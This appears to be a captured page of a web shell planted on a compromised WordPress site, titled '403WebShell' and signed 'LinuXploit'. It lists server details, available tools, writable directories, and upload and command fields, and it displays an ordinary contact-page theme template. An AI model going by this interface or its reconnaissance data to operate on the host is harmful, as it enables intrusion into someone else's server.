Warning: chmod(): Operation not permitted in /var/www/alexvillarreal/wp-content/plugins/custom-post-type-ui/custom-post-type-ui.php on line 8
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.114
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/alexvillarreal/wp-content/themes/alex-villarreal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/alexvillarreal/wp-content/themes/alex-villarreal/contacto.php
<?php
/*
Template Name: Contacto
*/

get_header(); ?>

<div class="wrapper-page">
    <?php if ( have_posts() ) :
        while( have_posts() ) : the_post(); ?>
            <h1 class="titulo-seccion text-center"><?php the_title(); ?></h1>
            <div class="container contenedor-contacto">
                <div class="row">
                    <div class="col-md-12 text-center contenedor-btn">
                        <p>Todo lo que necesitas saber de mi:</p>
                        <a href="<?php echo get_template_directory_uri(); ?>/AV-Press-Kit-Sitio.pdf" target="_blank" class="btn-gradiante"><img src="<?php echo get_template_directory_uri(); ?>/img/iocono-descarga.svg" alt="icono-descarga">Descargar alex villarreal press kit</a>
                    </div>
                </div>
                <div class="row contenedor-formulario">
                    <div class="col-md-8 col-md-offset2 col-sm-8 col-sm-offset-2">
                        <?php
                            /*
                            $form_alex = '[contact-form-7 id="45" title="Contacto" html_class="form-contacto-alexV"]';
                            echo do_shortcode($form_alex);
                            */
                        ?>
                    </div>
                </div>
                <div class="row">
                    <div class="contenedor-icono-contacto">
                        <div class="icono-contacto"></div>
                    </div>
                    <div class="info-contacto text-center">
                        <div class="telefono-contacto">+52 (81) 8040.1071/72</div>
                        <div class="info-texto-contacto">Skype: odiseaconsultores</div>
                        <div class="info-texto-contacto">Guillermo Prieto No. 205 interior 2</div>
                        <div class="info-texto-contacto">Col. Palo Blanco, San Pedro Garza García, N.L. México</div>
                    </div>
                </div>
            </div>
        <?php endwhile;
    endif; ?>
</div>

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit